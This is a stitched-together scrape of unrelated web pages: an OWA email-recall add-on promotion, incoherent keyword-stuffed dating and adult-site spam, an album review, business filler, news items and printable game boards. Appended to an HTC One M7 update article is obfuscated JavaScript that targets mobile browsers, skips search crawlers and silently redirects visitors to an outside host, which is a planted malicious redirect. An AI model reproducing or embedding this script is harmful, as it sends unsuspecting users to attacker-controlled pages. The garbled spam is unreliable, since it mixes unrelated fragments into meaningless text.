Whenever OWA users hit Send in error, there is little they can do. To recall a message sent from OWA you need to open Office Outlook, lookup the email just sent from OWA and click Recall This Message.
Of course this is not a valid solution, especially for those using OWA as their only mailbox interface. Furthermore message recalling is a race against time. Any time wasted in switching to Outlook is going to greatly reduce the likeliness that the recall operation succeeds.
The extension is available for both MS Exchange 2007 and 2010. As an OWA add-on, this is installed on the Exchange Client Access server(s) where OWA is running.
Apart for installing the OWA extension, the Message Recall Engine is also required. This is the component that processes recall requests and must be installed on the Exchange Hub Transport server(s). Of course Organizations running everything on a single Exchange server machine (as in SBS) would simply install both OWA Recall and the Engine on the same server.
As shown in the previous screenshot, this extension adds a new sidebar entry. OWA by default allows for up to 6 full-size sidebar entries. Once the limit is exceeded, additional entries are shown as small icons. So the extension may look a bit differently depending on your Exchange version and on whether you have other OWA sidebar add-ons.
This opens the list of emails under Sent Items sorted by date/time. From here double click the email just sent to open the Recall This Message dialog.
This dialog shows the salient email details allowing us to confirm we are recalling the right email. The options relevant to message recalling are located at the bottom.
Note how there is no 'Recall and Replace' option. This was intentionally left out in order to encourage users to act quickly. Recalling is a race against time and one should immediately submit the recall request without wasting any. A few seconds can easily make all the difference between a successful and a failed recall. So the best approach is always that to recall an email immediately and to submit the corrected email calmly without committing further errors.
This dialog is simply saying that the recall request was submitted. Whether or not the request is fulfilled will be reported through notification emails (if requested). This is what a success notification looks like in OWA 2010.
Erring is human, but the fact remains that some errors can be damaging to an Organization. So having the ability to recall emails directly from OWA will be welcomed by many.
With a single server unlimited users license priced at $290, there is little question on the ROI. Recovering from a single bad error will easily justify the investment. Added to that, for this price you get the entire WinDeveloper Message Recall package including a message recalling engine that greatly improves the success rate of recalled emails.
This advice is hopelessly out of date. My OWA looks nothing like this and there's no "recall message" command in sight.
This is awesome, we successfully implemented it for one of our big client. We are also doing some innovative work, we can customize outlook to match a company's brand identity. Please have a look at http://www.custominterface.co/outlook-web-app-2010.htm
Copyright © 2005 - 2018 All rights reserved. ExchangeInbox.com is not affiliated with Microsoft Corporation
Angela Desveaux, Katie Moore and Michelle Tompkins handle songwriting, vocals and guitar. They are joined by Mike O'Brien on lead guitar, Andrew Horton on upright bass, Joe Grass on dobro and pedal steel, and Dave Payant on drums. The unassuming supergroup combine their distinct personal styles to create delicate vocals, some truly beautiful harmonies, and just the right amount of guitar and pedal steel atmospherics.
The ten tracks here are diaristic, small-town, peripatetic tales of love and toil, minus the emotional rubbernecking and longing. "Save time for living, it'll vanish like the sun," they croon on "Leaving Thunder." From the opening tracks, "Come Around" and "Only Temporary," through to "Another Day," "Tip Jar" and the closer "Begin Again," El Coyote effectively subverts the sad-country nostalgia trope with a velvety live-each-day-like-it's-your last aesthetic.
Recorded at Montreal's the Treatment Room, El Coyote's self-produced, self-titled album is technically the group's first output, but could easily pass for a collection of unearthed classics. (Independent)
Fifth Harmony's Lauren Jauregui On Understanding male dating behavior Upcoming Tour amp; What She Wants For Christmas; Camila Cabello Dishes About Her Highly-Anticipated Solo Album Tinder may be getting press for being a hookup hotspot, but there are several excellent options for finding one-night stands, no matter your preferences.
While there is no official handbook or rule guide, most dating apps operate more or less the same way. You download the app, create a profile, add some of your. The Ukrainian Brides Scam Gets Pulled on My Friend. Most of the world by now is familiar with Ukrainian brides. Youve heard the stories-Western dr phil online dating scams jen, desperate. Mar datting, 2013nbsp;0183;32;He's cute, fun, smart and you can't stop thinking about him. You're already three steps ahead of the game, mentally planning weddings, children and that.
) Teaches you about different. Entertainment Tonight (ET) is the authoritative source on entertainment and celebrity news with unprecedented access to Hollywood's biggest stars, upcoming movies. Cybersex is tons of fun, but it's important to play safe. Here are a few practical safety tips to help keep your online dating secure and anonymous. Online Dating. The internets Hottest online dating and personals meeting site Yahoo Lifestyle is your source for style, beauty, and wellness, including health, inspiring stories, and the latest fashion trends. monitoring_string quot;81f1107463d5e188739a27bccd18dab9quot;monitoring_string quot;e515715cc11bfd2d7009dd73cfdbe162quot;monitoring_string quot;630c2418a1cab4c8f99991b8657516a3. Gmail is email that's intuitive, efficient, and useful. 15 GB of storage, less spam, and mobile access. Tinder is a location-based social search mobile app that allows users to chat. The app is most commonly used as a dating app or hookup app, but it also has services. Basic questions regrading Match. com such as hiding your profile, changing the primary photo, deals on Match. com, winking questions, and the 6-month guarantee. The legacy we leave to our future generations. Let's be the change and make the world a better place. Totally FREE Christian Owned Dating Site. No scams. Absolutely always free Christian singles service. 1 single Christian personals sites marriage introduction. Catch fully commentary archive of India vs New Zealand, 3rd Match, May 28, ICC Champions Trophy Warm up matches, 2017 on Cricbuzz Should You Ever Call a Guy. Why The Rules Arent Meant to Be Followed. Meet hot girls interracial dating in charleston sc hot guys, rate pictures of people hot or not on our free personals dr phil online dating scams jen online dating site. Your local source for breaking news, sports, business, classifieds, and entertainment in El Paso. Daily paper. Local, state, and wire news and commentary. Photo dr phil online dating scams jen, business and obituaries. Jerusalem is at the center of the Arab-Israeli conflict. What are the spiritual, historical and political claims from both sides. Meet local adults for no strings attached dating dr phil online dating scams jen the web's only member-voted online dr phil online dating scams jen elite sa online dating service. Block Communications, Inc.(BCI) dr phil online dating scams jen a 112-year-old privately held dating mobile chat media holding company headquartered dr phil online dating scams jen Toledo, OH. It has primary operations in. BiChatRoom is the best bisexual dating site for bisexual, bi curious singles tivo roamio hook up couples starting out with something in common, love for Bisexual Passion. World's 1 website for graphic designs including logos, web, t-shirts amp; more. Work with top graphic designers amp; get 100 Money Back Guarantee. A Foreign Affair international dating service meet Russian women Latin women Asian women colombian women amp; china women for love, 75 tours a year to meet Russian. The Hollywood Reporter is your source for breaking news about Hollywood and entertainment, including movies, TV, reviews and industry blogs. Hunt, a professor of sociology and African-American studies, is the lead author of the Bunche Centers Hollywood Diversity Report. How to Recognize Herpes. Herpes is caused by the Herpes Simplex Virus. It has two variations, the HSV-1 and HSV-2. HSV-1 usually manifests as a cold sore, or oral. Searching for Big Beautiful Women on BBW Dating sites. Not finding any. Join BBWHookup. org and chat with Plus Sized Beauties and Sexy Chubby Ladies today. The Siege of Budapest or Battle of Budapest was the 50-day-long encirclement by Soviet forces of the Hungarian capital of Budapest, near the end of World War II. In a move named by Jackson's advisers as quot;refinancing,quot; it was announced in April 2006 that Jackson had struck a deal with Sony and Fortress investments. How to Attract an Aries Woman as a Gemini Man: Youve got a tiger by the tail here, so be careful. Youre both full of energy, though hers is more physical than.
By Joy Browne. Dating doesnt have to be nerve-wracking, but it does require preparation. You must do some up-front soul. Free Online Dating, Singles, Free Dating, Free Matchmaking, Match, Love Life, Find Love Free, Find A Mate, Free Gifts, Join the World's Hottest Singles Website Online. Have a US Visa Interview appointment. Here are some B1 B2 Visa Interview questions and answers to help in your preparation. READ this before your interview. This page is pitifully old, sorry. ;-) quot;I'm gonna make him an offer he can't refuse. quot; Don Corleone to Johnny Fontane about Woltz quot;A man who doesn't spend time with. As a recently diagnosed bipolar 2 I can't help wondering upon reading the many much more severe cases in web sites all over the internet what contitutes bipolar and. Nov 24, 2017nbsp;0183;32;Find Bigg Boss Tamil Latest News, Videos amp; Pictures on Bigg Boss Tamil and see latest updates, news, information from NDTV. COM. Explore more on Bigg Boss Tamil. Abella Danger stripping and masturbating Pictures And Movies at Freeones courtesy of Abella Danger her official site If you love someone and want to know the love marriage prediction. Here we are explaining dr phil online dating scams jen possibilities of your love marriage prediction. Revelstoke hookup relationship with a Taurus man can be one of the most dr phil online dating scams jen youll ever have. Other earth capricorn man dating sagittarius woman tend to be the best match for a Taurus man, so if youre a. Introduction in Vedic Astrology -- Jyotish. Services of world-renowned astrologers. Personalized predictions. Details about dr phil online dating scams jen knife making, knife websites, patents, funny inspirational quotes dating, prices, points on fine handmade dr phil online dating scams jen knives, value, investment potential The Dr phil online dating scams jen Republic (or informally Czechia) is a small landlocked country in Central Europe, situated southeast of Germany and bordering Austria to the south, Poland. 171;12 Kisses187; is a free dating site for Ukraine. There is no charge for signing up, sending messages or exchanging contacts. This is the Agape matchmaking version of Ukrainian. Find love, or something a little less serious, on your phone. If you are interested in Russian girl, Ukrainian women or Asian dating, review best mail order bride sites - AnastasiaDate, CharmDate, RussianCupid, etc. 11 December 2017. Zachary Quinto news, gossip, photos of Zachary Quinto, biography, Zachary Quinto boyfriend list 2016. Relationship history. Zachary Quinto. Full help on finding the top free dating sites amp; paid dating websites if you're dating online, including dating safety tips amp; more from Money Saving Expert EbonyClipss. com is filled with ebony babes, black chicks amp; interracial porn. We have indexed and ranked the best ebony porn, so just click your favorite videos amp;. Free Hair Makeover Dating games for everybody. - This beautiful young lady is going on a blind date but doesn't feel as though she's ready. Help dress her up and give. Dating as an institution is a relatively recent phenomenon which has mainly emerged in the last few centuries. From the standpoint of anthropology and sociology. Use our 100 tested eHarmony promo code and join for 3 months. Get the best price for your eHarmony membership amp; search eHarmony discounts -DatingPriceGuide Denver Black Pages is a Business and Entertainment Guide for Denver Metro's Black residents and visitors- calendar, nightlife, food, business directory, churches, and. The Rules for Guys High on the bestseller lists this week is a book called The Rules, a guide to dating and courting for women which effectively advocates that women.
Relationships 6 New Dating Apps (That Aren't Tinder) Worth Trying If you're new to the mobile app dating game or want a break from Tinder, try these new services. To commemorate the 200th anniversary of the death of Jane Austen, we looked at how Mr Darcy might fare on Tinder. Online dating in Russia hasnt taken off to the extent it has in other parts of the world. The best online dating sites in Russia cannot compare in terms of quality. Among American Tenniss Sudden Wave of Promising Teen-Agers, CiCi Bellis Stands Out Online Dating at Ladyboydating. net - World's 1 Ladyboy Dating Site Find single members with photo, video, chat online and date out. Good luck. eHam. net Classifieds Search Results (6383 records found. Display All ads) Description. GTA IV marks Liberty City's fourth appearance in the series after the original Grand Theft Auto, Grand Theft Auto III and Grand Theft Auto: Liberty City. If you're just looking for casual questions to ask someone on a first date, go here. If you want to know what to say dr phil online dating scams jen you approach a girl for the first Get the latest breaking news across the U. cr ABCNews. com Watch free 600 Free Live TV Dg. See 45000 Complimentary movies TV shows and documentaries. Record French dating websites TV zero cost. View Dd Movies at no charge. Sugar Mamas dot dr phil online dating scams jen is the best dating site for Sugar Mama to catch younger men. Join for Free and find your perfect sugar mommy dating sites odisha today. Learn the Symptoms and Treatments of Aspergers Syndrome. If dr phil online dating scams jen tired, frustrated, angry and confused about dr phil online dating scams jen to help your child or other loved one cope. How many types of radiometric dating are there Former My crush is dating a girl Survival host Joe Dating 30 year old man addresses his departure from the show in new fan Qamp;A Welcome to Adult App Mart, your source datign porn on android and sex on android. Join now to get the best deals on porn app downloads and free sex virtual games. The conflict sacms Palestinian Arabs and Zionist messenger dating chat Dr phil online dating scams jen Jews is a modern phenomenon, dating to the end of the nineteenth century. Although the two groups. TOP 5 - Best BDSM Sites Reviews | Dating Guide for Kinky, Fetish and BDSM. Looking at the sizzling response that 50 Shades of Grey received, it can be said that. Races in Depth Decisions, decisions, decisions. Which race to run. Where. When. Why. What info do I need. Find Your Answers Here. Races in Depth: Features the event. Help. My Brother-in-Law Set Me Up to Be Drugged and Sexually Assaulted by His Friend. Organization to promote responsible taxation and government spending. View spending trends, press releases, membership, county taxes and fees and contacts. Automatically formats, alphabetize, and prints bibliographies for free. Lookin4ne1. I had the worst time trying to use free dating apps to find girls since most of them never even acknowledged me and it drove me crazy. Steve Huffman, the thirty-three-year-old co-founder and C. of Reddit, which is valued at six hundred million dollars, was nearsighted until November, 2015, when.
So powerpoint if you would like get all of these wonderful graphics related to powerpoint free download templates, click save link to store the photos for your pc. There’re ready for obtain, if you appreciate and want to grab it, just click save badge on the article, and it’ll be immediately down loaded to your laptop computer.
Here you are at our site, articleabove powerpoint free download templates published by admin. At this time we’re pleased to declare that we have discovered an incrediblyinteresting topicto be pointed out, that is powerpoint free download templates Some people trying to find specifics of and certainly one of these is you, is not it?
Share book reviews and ratings with Doubleinfinity Book Club, and even join a book club on Goodreads.
The work Romance represents a distinct intellectual or artistic creation found in Dougherty County Public Library. This resource is a combination of several types including: Work, Language Material, Books.
An actress is stabbed and the incident turns out to have been a publicity stunt for her play. That gives someone an idea because she is stabbed again and this time doesn't get up. Detectives Steve Carella and Bert Kling investigate the murder. By the author of And All Through the House
«Mr Varoufakis’ mistake was to over-estimate the strength of the anti-austerity camp, and their willingness specifically to back a far left government. When it comes to Greece, the “faction” of Europe that runs policy is the Germans and their allies on the ECB. When it comes to France and Italy, the Commission is in charge. (...)
I still think the most likely outcome is that the unresolved political battle at the centre of Europe goes on being unresolved. And time is Syriza’s main enemy. If, by June, the ECB council is still calling the shots on Greek debt, then the German government – facing a growing revolt in the CDU/CSU over the terms of Greek forgiveness – will force another, bigger showdown.»
Founded in 2009, BungoBox now has 17 locations in the U. Franchisor Franchise Broker. As with starting any new business, creating a business plan for your franchise is a critical step in the buying process.
But also because business plans are one of the crucial foundations for the beginnings of a business.
To get a business loan, you will also need a business plan. Again, one of the advantages of a franchise business, in relation to creating a business plan, is that most of this information is readily available. Buy an existing business or franchise.
Creating ongoing value is critical for a successful franchise relationship. Read. You should prepare an annual plan for your company that creating a business plan for a franchise projections for franchise. page 2.
Anyone whos thinking about starting a new business is going to need to create a business plan. Franchisor Franchise Broker. Read.
And if you are looking to secure financing for your. As a result, they may contact you about becoming a franchisee. open-closed.
Giclées on canvas are exhibited among the most renowned art museums and galleries, as they are considered fine art. Giclée (jhee-clay) is a French word meaning droplets or sprays of paint.
Frank Allnutt's giclées are produced on museum quality canvas with ten archival inks. The result is a greater range of color (gamut) than dye prints on photographic paper. While color photos fade relatively quickly, pigment inks used in the giclée process are laboratory tested to retain color integrity for up to 200 years, under normal conditions.
Printed canvases can be purchased flat (unmounted), gallery wrapped, or framed in blue pine frames, rustic wood frames, and black gallery frames.
Can't find what you want? We have access to thousands of images that do not appear on our web site. Contact Us and tell us what you're looking for.
Frank Allnutt began his creative career at the Walt Disney Studio and went on to become Public Relations Manager of WED (Walt E. Disney) Enterprises, the "Imagineering" (planning and design) firm for Disneyland and Walt Disney World. It was at WED where he became fascinated with the similarities between Disney animation art and ancient Egyptian tomb mural art. It inspired him to return to his long-held interest in photography and painting.
Eventually, his artistic abilities were put to work. He created early concept drawings for the Disneyland Light Parade and "Walt Disney's Wonderful World of Water" show for Walt Disney World.
After leaving Disney his art was once again placed on hold, and writing books became his number one passion. Today, a best-selling author of dozens of books and booklets, he is perhaps best known for The Force of Star Wars, which has been distributed worldwide and translated into many languages. Frank now resides on an historic cattle and hay ranch in the heart of Colorado's Rocky Mountains.
His biography appears in The International Who's Who of Intellectuals, The International Book of Honor, and a score of other biographical reference works.
$twenty $60 ACRYLIC Elimination THERAPY Elimination of acrylic nails consists of soak off & buffing, accompanied by exfoliation, hydrating cuticle repair therapy, nail shaping, and polish application over the all-natural nail.Lynda T. stated "To start with off, I apologize to anybody who has become subjected to my newbie singing skillz at this part
Just click here to invest in a gift certificate on line that you could print at home or email to some Fortunate receiver! The appropriate nourishment and supplementation can assist you thrive, relatively, than survive during leg day. This is certainly what you need to know about how to gasoline up, recover, and even cheat correct!The disorders wh
Prices may or may not include all graphics shown. Please review the specific Design Description for individual kits. Cases, packaging, wire mgmt., graphics, and monitor mounts are not included for most counters, workstations, and pedestals, except where indicated. Kit packaging and prices may vary depending on the final design, materials, and labor.
Then email your "My Gallery" to colleagues, friends, or your favorite exhibit designer. There's no better way to begin designing a display that reflects your exhibit marketing goals.
Note: My Gallery uses a temporary browser cookie to store your gallery. We recommend that you send your gallery to your email address if you need to retain it for longer than 30 days.
Production-ready artwork (when applicable) must accompany the order confirmation. Delays in uploading artwork may lead to expedited charges or shipping changes.
Shipping is based on the availability of materials and graphics. Additional charges may apply if materials or graphics must be expedited.
Shorter lead times may be available based on schedule openings in Customer Service and Production. Rush charges may apply.
Exhibit Weight varies depending on the packaging and the shipping method. Variables include but are not limited to:
Dimensional Weight vs. Actual Weight: Dimensional weight is defined as crate or case size. On most air shipments, the dimensional weight exceeds the actual weight
Portable Cases vs. Wood Crates or Molded Tubs (where applicable): Exhibit designs that require one wood crate would require multiple portable cases. Selecting one vs. the other affects the total weight (dimensional or actual).
Freight Carrier: LTL carriers (Less than Truckload) quote freight based on space used. UPS, FedEx, and air freight carriers quote freight based on either the dimensional or the actual weight of the shipment.
Freight Service Level (number of days): Service levels range from Same Day Delivery to Two Week Delivery.
For more information about exhibit weights and freight options, please contact your local exhibit representative.
Electrical, Cord, and Wire Management varies depending on the display and each exhibitor's requirements. When ordering your trade show display, consider the following electrical/wire management issues and discuss your options with an exhibit professional:
By reviewing your wiring options BEFORE you order your display, you'll save TIME and MONEY and ensure your exhibit exceeds your expectations and your installation is trouble-free.
Have you fallen for the idea that you can create an “Evergreen” business? One that once set up, will continue to print money for you without your personal input.
This is the promise of emerging new smart technology with software, bots, and algorithms that will do all your rote grunt work and simple thinking for you. Of course, it won’t be able to strategize or even offer your customers any “real support” if they have an issue or question that is not listed on your Q & A’s. In fact, how often have you had a query that just couldn’t be answered through a quick search on a company’s website?
How much time have you wasted trying to search for answers when it would be much quicker and easier just to get someone on the phone? And of course, how often have you been frustrated by a company’s automated answering system?
All of these reasons and the glaring fact that very few businesses or gardens for that matter will continue to grow without constant attention and some good ol’ TLC.
Businesses that grow, thrive and continue to reap profits are those that are cared for and loved by smart, well-intentioned human beings that work on their businesses day in and day out to make them better and better each day, each week, each quarter, and each year.
Watching the subtle changes in customer’s moods, usage and purchasing habits. Watching what their competitors are doing, and what’s happening in the marketplace outside their company’s walls. And most importantly, keeping their people, their customers and clients excited and motivated about what’s working (current success stories) as well as, keeping them abreast of all the great products and services that they’re diligently working on that are due to be released in the not so distant future.
Evergreen is a constant state of engaging with your company both inside and out. Evergreen is possible only if you keep working persistently both in and on your business keeping it strong, nimble and pointed in the right direction.
Dominic Kotarski is the author of international best-seller “The Making”. He writes, speaks, inspires, motivates and teaches the most important aspects of your business including Sales, Coaching, Team-Building, People Management and Business Development. Get weekly access to his blog & training videos FREE by subscribing HERE! and when you sign up you will get Instant Access to his Sales Skills Training Video.
5 tips on finding your new career — Dominic Kotarski: […] when you branch out to renew your vows t...
Nike Air Max, Converse Chuck Taylor All Star, Nike Air Force, UGG, Mens shoes sale, Womens shoes online
Badge Fastener Option: Please select which fastener you would like for your badge. The 'Jewelers Locking Pin' is included in the price of each badge, and the other fasteners add to the dollar amount of each badge. \n
Surface Protection Option: Our 3D Crystal Doming process involves pouring a liquid acrylic material over the face of the badge. The liquid is then exposed to UV light which hardens the acrylic material into a rounded 'dome' shape. It serves to protect the face of the badge and add dimension to the product.
If you are trying to outfit a large number of employees or on a tight budget then our Associate Class plastic name badges might be perfect for you.These badges are made of light weight 1/16" plastic and feature rounded corners. Your custom graphics are Thermally Laminated to the surface.
In order to use a Logo or Design you must have the full rights to use the Logo or Design. If you are unsure or have doubt over ownership, please confirm you ownership or ask permissions form the owner.
If for any reason the legal owner of this Logo or Design contacts fulfillment house they will be directed to me.
Embroidery requires special files that contain information on how to stitch your Logo or Design and what color threads to use. Normal files do not contain this data, so we have to convert these images to embroidery files.
In den Jahren 1998-2001 wurde das Wiener Konzerthaus unter der Leitung von Hans Puchhammer generalsaniert. Im Atelier Gespräch erzählt der Architekt vom Umbau und reflektiert, worauf bei der Planung eines Konzertsaals zu achten ist. Der Instrumentenbauer und Cellist des Ensembles PHACE Roland Schueler gibt einen Einblick aus der Sicht eines Musikers und sorgt für musikalische Erläuterungen. » mehr...
UNO's Lakefront campus is the venue for many annual events. Our events are unique and have become a tradition on campus throughout the years.
The Research and Technology Park has a variety of facilities to meet the needs of the tenants, the university and the community.
The Office of Research and Sponsored Programs helps to assist faculty in fulfilling their research goals.
Discover New Orleans' premiere events center which is home to the UNO Privateers and many spectacular concerts.
One of the premier tennis facilities in the south, featuring 20 deco turf hard courts, and six red clay courts.
University of New Orleans graduate student Arielle Brown has been selected to participate in the Artist as Citizen Conference at The Juilliard School in New York City. Brown, who is pursuing a master’s degree in theatre performance, is one of 60 visual and performing artists who were chosen. The conference, which will take place June 12-17, is presented by the nonprofit Artists Striving to End Poverty.
Participants will stay on Juilliard’s Upper West Side campus, perform and learn how to use their art in order to bring about positive change. They will receive instruction from Juilliard’s faculty and alumni as well as industry professionals. The mission of the conference is to celebrate, connect and develop young leaders in the arts by providing them with a transformative artistic and educational experience. Participants are actors, dancers, sculptors, musicians, filmmakers, composers and singers from across the United States.
Brown, a native of Grenada, Miss., holds a bachelor’s degree in theatre from Jackson State University. She is a model and actress who has appeared in print advertisements, television commercials and music videos.
Artists Striving to End Poverty is a New York City-based organization that connects artists with underserved youth around the world. It places volunteer artists in classrooms in the U.S. as well as India, South Africa and the Dominican Republic.
Este dominio ya fue restaurado y no está suspendido. Si usted es el titular por favor actualice los nameservers para que resuelva a su página.
Anyhow, you guys are not required to be concerned in this regard anymore because the company is now going to serve the predecessor owners with the latest HTC One M7 update that might hit the notification bar in May.
Users must be eager to know what new comes with the projected update. Well, this is exactly what you guys have been screaming out for since launch of this smartphone. Yes, the much-awaited Sense 6.0 is accompanied by many other goodies. So this is going to be a large treat for fun hungers.
If you are looking forward the HTC One M7 update madly, then try to be patient at least until the next month because this upgrade wona??t go live before the upcoming month. The new Sense 6.0 is not of frivolous importance as it contains things that are worth using for the HTC users.
It seems the HTC One M7 update will not be hitting your phone before the last week of May 2014. This is why users should be patient in order to get the timely update without any further delays. The UI has been groomed up to give stunning user experience along with ease of navigation.
Some of the mess things are being taken away in order to refine the user interface in a distinct and better way. One thing that stands out as prominent is the flat user experience that gives easy swaps through home screen. Keep your desires up to check out the new sense color themes.
You will be informed when the HTC One M7 update makes it way straight to your device.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
Great options given above. Although the original elf yourself app is not available for android, yet we can make our…
The father of Rome, Georgia pilot Gary Tillman, who died with his daughter and her friend in a 2005 plane crash, said the family is suing the Federal Aviation Administration in an effort to clear his son’s name.
Air-traffic controllers at a Florida airport should have guided Gary Tillman’s Cessna directly to a beach before the December 2005 crash in the ocean, according to a lawsuit filed May 17 in U.S. District Court in Jacksonville, Fla.
In the suit, Denise Tillman claims air-traffic controllers at Craig Airport in Jacksonville directed her husband to fly over the ocean toward the airport in St. Augustine shortly before the crash.
Tillman had requested permission from the controllers to land on a nearby beach after the plane’s engine began to fail, the suit claims.
Tillman, his daughter, Hannah, and one of her friends, Anna Kipp, died after the plane went down into the ocean near St. Augustine.
“We are concerned that Gary’s name is protected, and that he did what was right and proper,” Earl Tillman, said Wednesday. “He was a trained pilot.”
Denise Tillman seeks more than $75,000 in damages in the wrongful death suit against the FAA. Efforts to reach her failed Wednesday.
Repeated efforts by the Rome News-Tribune to reach Jacksonville attorney Woody Wilner, one of the lawyers for the family, were unsuccessful.
A spokesperson with the FAA, which manages U.S. air traffic, said the agency does not comment on litigation.
Tillman reported the problem to air-traffic controllers and asked to land on a beach to the right of the plane.
Tillman could not see outside of the cockpit “due to poor visibility” and relied on the plane’s instruments and the controllers’ instructions for navigation, the lawsuit states.
Controllers directed Tillman to fly south to St. Augustine Airport. They were able to monitor Tillman’s flight by radar and knew the single-engine plane would not reach the airport, the lawsuit alleges.
“The FAA’s directions were not reasonably calculated to lead (Tillman’s plane) to safety,” the lawsuit states. “As a result, the aircraft crashed about one mile from the beach.”
The family also claims the FAA failed to notify the U.S. Coast Guard immediately after learning Tillman’s plane could not maintain altitude. According to the suit, the agency’s negligence caused Tillman and his daughter to drown. << back
On this page you will find a few printable blank game boards. The boards can be printed on card stock or if you will be making "file-folder" games, print on heavy paper and glue inside of a file folder. After printing the game boards, be sure to look at Game Board Assembly if you need instructions on how to make the two printed board halves one whole game board. If you are having trouble printing the files, look at the Printing Suggestions.
I have two game board types to print. One type is the Start to Finish game style in which the game has distinct starting and ending places. The other type is the Race Track game style in which the player goes around and around the board track until something happens to make the game end.
Some of the templates are completely plain while others have some marking on them. Some are in color and some are not. I've included images to help you decide if you want to print any. The files are pdf and that means they are not editable. I know that is a disadvantage, but I made most of the templates from drawings, only one was made with a word processor.
Yes, I have Printable Blank Dice and if you don't like what I have, go look at my Cube Templates. There you'll find printable cubes, or we can all them die on this page, in several sizes and, not only that, they are doc files so if you have die images that you want on your dice, then you can add it to the doc file before printing.
When applicable, I included the images that I made for the game board. No files or images from this website may be used for commercial or for profit purposes.
Both boards have similar markings. The file 006 has less detail. The game board below is similar to these two.
Similar to the two above, this game board has the most markings and a starter card set. The card set is not complete, it's more of a beginning. See Blank Game Cards
The two game boards shown here are the Race Track type. The one on the left is a plain version of the 3 previous boards. The board on the right is very plain.
If you think the margins are not wide enough on the files, use the Page Handling setting: Fit to printable area or Shrink to fit. or some similar setting. The option should appear when you press the pdf's print button.
Subscribe to DonnaYoung.org or YoungMinds, and receive access to files and no 3rd party advertising, which means a faster and better website.
So, CodingZap is simply starting to be your aiding buddy to help you in obtaining you superior grades and clearing your idea in programming.
I had been researching and applying LSTMs for some time and needed to generate anything on the topic, but struggled for months on how precisely to existing it. The above mentioned issue crystallized it for me and this total book arrived collectively.
